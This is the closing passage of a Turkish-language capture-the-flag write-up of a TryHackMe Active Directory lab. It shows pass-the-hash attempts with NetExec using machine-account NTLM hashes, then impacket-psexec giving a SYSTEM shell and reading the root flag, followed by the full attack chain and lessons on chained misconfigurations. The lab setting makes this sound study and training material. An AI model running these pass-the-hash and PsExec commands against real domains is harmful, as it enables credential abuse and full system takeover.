12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u 'BackupServer$' -H '46a4655f18def136b3bfab7b0b4e70e3'                     
SMB         10.114.157.19   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\BackupServer$:46a4655f18def136b3bfab7b0b4e70e3 STATUS_LOGON_FAILURE
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u 'DatabaseServer$' -H '406b424c7b483a42458bf6f545c936f7'                         
SMB         10.114.157.19   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u 'CitrixServer$' -H '48fc7eca9af236d7849273990f6c5117'                           
SMB         10.114.157.19   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB         10.114.157.19   445    DC01             [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# nxc smb 10.114.157.19 -u 'FileServer$' -H 'e41da7e79a4c76dbd9cf79d1cb325559'         
SMB         10.114.157.19   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:None)
SMB         10.114.157.19   445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
                                                                                                                     
┌──(root㉿kali)-[~/thm/soupedecode]
└─# 

Sonuç:

1
(Pwn3d!)

Machine account hâlâ aktif.

Daha önemlisi ADMIN$ paylaşımına erişebiliyor.

Bu da uzaktan kod çalıştırabileceğimiz anlamına geliyor.


Remote Code Execution

Pass-the-Hash ile PsExec kullanıyorum.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
──(root㉿kali)-[~/thm/soupedecode]
└─# impacket-psexec 'soupedecode.local/FileServer$'@10.114.157.19 -hashes ':e41da7e79a4c76dbd9cf79d1cb325559'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.114.157.19.....
[*] Found writable share ADMIN$
[*] Uploading file VWEMKUOd.exe
[*] Opening SVCManager on 10.114.157.19.....
[*] Creating service zCpQ on 10.114.157.19.....
[*] Starting service zCpQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
27cb2be302c388d63d27c86bfdd5f56a

C:\Windows\system32>

Artık SYSTEM yetkisine sahibiz.


Attack Path

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Guest Enumeration
        │
        ▼
RID Bruteforce
        │
        ▼
Username List
        │
        ▼
Username = Password
        │
        ▼
ybob317
        │
        ▼
Kerberoasting
        │
        ▼
file_svc
        │
        ▼
Backup Share
        │
        ▼
Machine Account Hashes
        │
        ▼
Pass-the-Hash
        │
        ▼
FileServer$
        │
        ▼
PsExec
        │
        ▼
NT AUTHORITY\SYSTEM

Öğrenilen Noktalar

Bu makinede zincir tamamen küçük güvenlik hatalarının birleşmesinden oluşuyor.

  • Guest hesabı üzerinden RID Enumeration yapılabiliyor.
  • Kullanıcılardan biri username=password kullanıyor.
  • Servis hesabı zayıf parola kullanıyor ve Kerberoast edilebiliyor.
  • Backup paylaşımı hassas NTLM hashleri içeriyor.
  • Machine account hashlerinden biri hâlâ geçerli.
  • Machine account uzaktan yönetim yetkisine sahip olduğu için Pass-the-Hash ile SYSTEM erişimi elde edilebiliyor.

Tek başına kritik görünmeyen yapılandırma hataları birleştiğinde tam domain ele geçirilmesine kadar giden bir saldırı zinciri oluşturabiliyor.


Sonuç

Bu oda özellikle aşağıdaki Active Directory saldırı tekniklerini pratik etmek için oldukça güzel bir senaryo sunuyor.

  • RID Bruteforce
  • SMB Enumeration
  • Password Spraying
  • Kerberoasting
  • Hash Cracking
  • SMB Share Enumeration
  • Pass-the-Hash
  • PsExec ile Remote Code Execution
This post is licensed under CC BY 4.0 by the author.